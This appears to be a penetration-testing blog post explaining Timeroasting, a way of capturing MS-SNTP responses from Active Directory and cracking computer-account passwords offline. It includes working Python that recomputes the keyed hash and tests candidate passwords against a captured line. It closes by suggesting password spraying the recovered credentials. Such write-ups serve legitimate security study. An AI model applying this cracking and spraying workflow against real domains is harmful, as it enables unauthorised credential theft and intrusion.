Wednesday, November 8, 2023

Intro to Timeroasting - A New Attack Against the Network Time Protocol (NTP)

Today we will be briefly covering a tool called "Timeroast" by SecuraBV which takes advantage of the Network Time Protocol (NTP) in Active Directory environments. This protocol is used when a system needs to synchronize its clock with the domain controller, and it has since been secured because of past MiTM attacks against the protocol and against system clocks. This more 'secure' feature is exactly what we'll be taking advantage of with this tool. Now although timeroasting is what you would consider a low probability attack, it is also a low effort attack which can be run in the background while further testing continues. Let's go ahead and cover some more of the features and details of the tool and protocol.


In short, the secured version of the NTP protocol includes the RID of the computer account in the NTP request, and the server's response carries a value derived from the NTLM hash of that computer account's password, using the hash as the key that secures the exchange. Using Timeroast we are able to capture these hashes as they're being communicated and potentially crack them offline on a Kali machine NOT directly connected to the domain! The tool also comes with a password cracker written in Python, which is very handy in our case as these hash types are not supported by Hashcat and there are hashing issues with John as well.
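To make the keyed response concrete, here is an added example (my code, not Timeroast's or Secura's) that rebuilds the MS-SNTP authenticator from a computer-account password and then performs the same offline comparison the included timecrack.py relies on. The `RID:$sntp-ms$<md5>$<salt>` line layout and the 48-byte sample reply are assumptions, and MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
import hashlib
import struct

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, inlined because hashlib's md4 is often disabled under OpenSSL 3."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = ((f, 0, (3, 7, 11, 19), range(16)),
              (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
              (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a, b, c, d = d, rot((a + fn(b, c, d) + x[idx] + k) & 0xFFFFFFFF, shifts[i % 4]), b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def ntlm_hash(password: str) -> bytes:
    # The NT hash is MD4 over the UTF-16LE encoding of the password.
    return md4(password.encode("utf-16le"))

def sntp_authenticator(nt_hash: bytes, response48: bytes) -> bytes:
    # MS-SNTP keys the reply with the account's NT hash: MD5 over the hash and the 48-byte NTP header.
    return hashlib.md5(nt_hash + response48).digest()

def make_timeroast_line(rid: int, password: str, response48: bytes) -> str:
    # Assumed Timeroast output layout: RID:$sntp-ms$<md5 hex>$<48-byte response hex>.
    mac = sntp_authenticator(ntlm_hash(password), response48)
    return f"{rid}:$sntp-ms${mac.hex()}${response48.hex()}"

def password_matches(line: str, candidate: str) -> bool:
    # The offline check the cracker relies on: recompute the authenticator with a candidate
    # password and compare. Only the captured line is needed, no contact with the domain.
    _rid, rest = line.split(":", 1)
    _, tag, mac_hex, salt_hex = rest.split("$")
    if tag != "sntp-ms":
        raise ValueError("not an MS-SNTP hash line")
    expected = sntp_authenticator(ntlm_hash(candidate), bytes.fromhex(salt_hex))
    return expected == bytes.fromhex(mac_hex)

# Constructed sample, not captured traffic: a 48-byte NTPv3 server reply header plus a
# known computer-account password, so the check can be exercised end to end.
SAMPLE_RESPONSE = bytes([0x1C, 0x01, 0x0A, 0xF0]) + b"\x00" * 44
SAMPLE_LINE = make_timeroast_line(1103, "workstation01", SAMPLE_RESPONSE)
```

Because the authenticator is a plain keyed hash over data the client already holds, a weak computer-account password is fully testable offline, which is the whole reason the "secure" mode is roastable.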


One downside to this attack is that the actual computer names are not included when the NTP hashes are captured, only the RIDs assigned to them. While it is possible to match RIDs to computer names, we won't be covering that in this post (one quick idea would be Kerberoasting as a potential way to gather usernames of the domain). Below you can see that hashes are dumped but no usernames are included, just the corresponding RIDs.

Gathering NTP hashes with timeroast.py

Also, certain systems were not requesting time synchronization with the domain controller at the time of running the tool, so each time you run timeroast.py you seem to gather some already captured hashes and some new hashes. You could continue to run this tool until you feel like you have exhausted the list of users, or, if you are already aware of the number of existing users in the domain, you could continue to capture hashes until you reach that number.


Managing to crack a hash with timecrack.py


With one of the passwords actually being recovered here using a simple wordlist with the included tool timecrack.py, we can see that this attack does indeed show some promise for gathering and cracking valid network credentials. Still not knowing the username this password belongs to, we could potentially password spray these found credentials across the domain, or go another route and try to match it with an already known username we are more confident it belongs to. The choice is up to your personal skillset and creativity on how exactly you could use these credentials to gain further access.

Happy hacking! :)
 

:LINKS:


https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf

https://github.com/SecuraBV/Timeroast

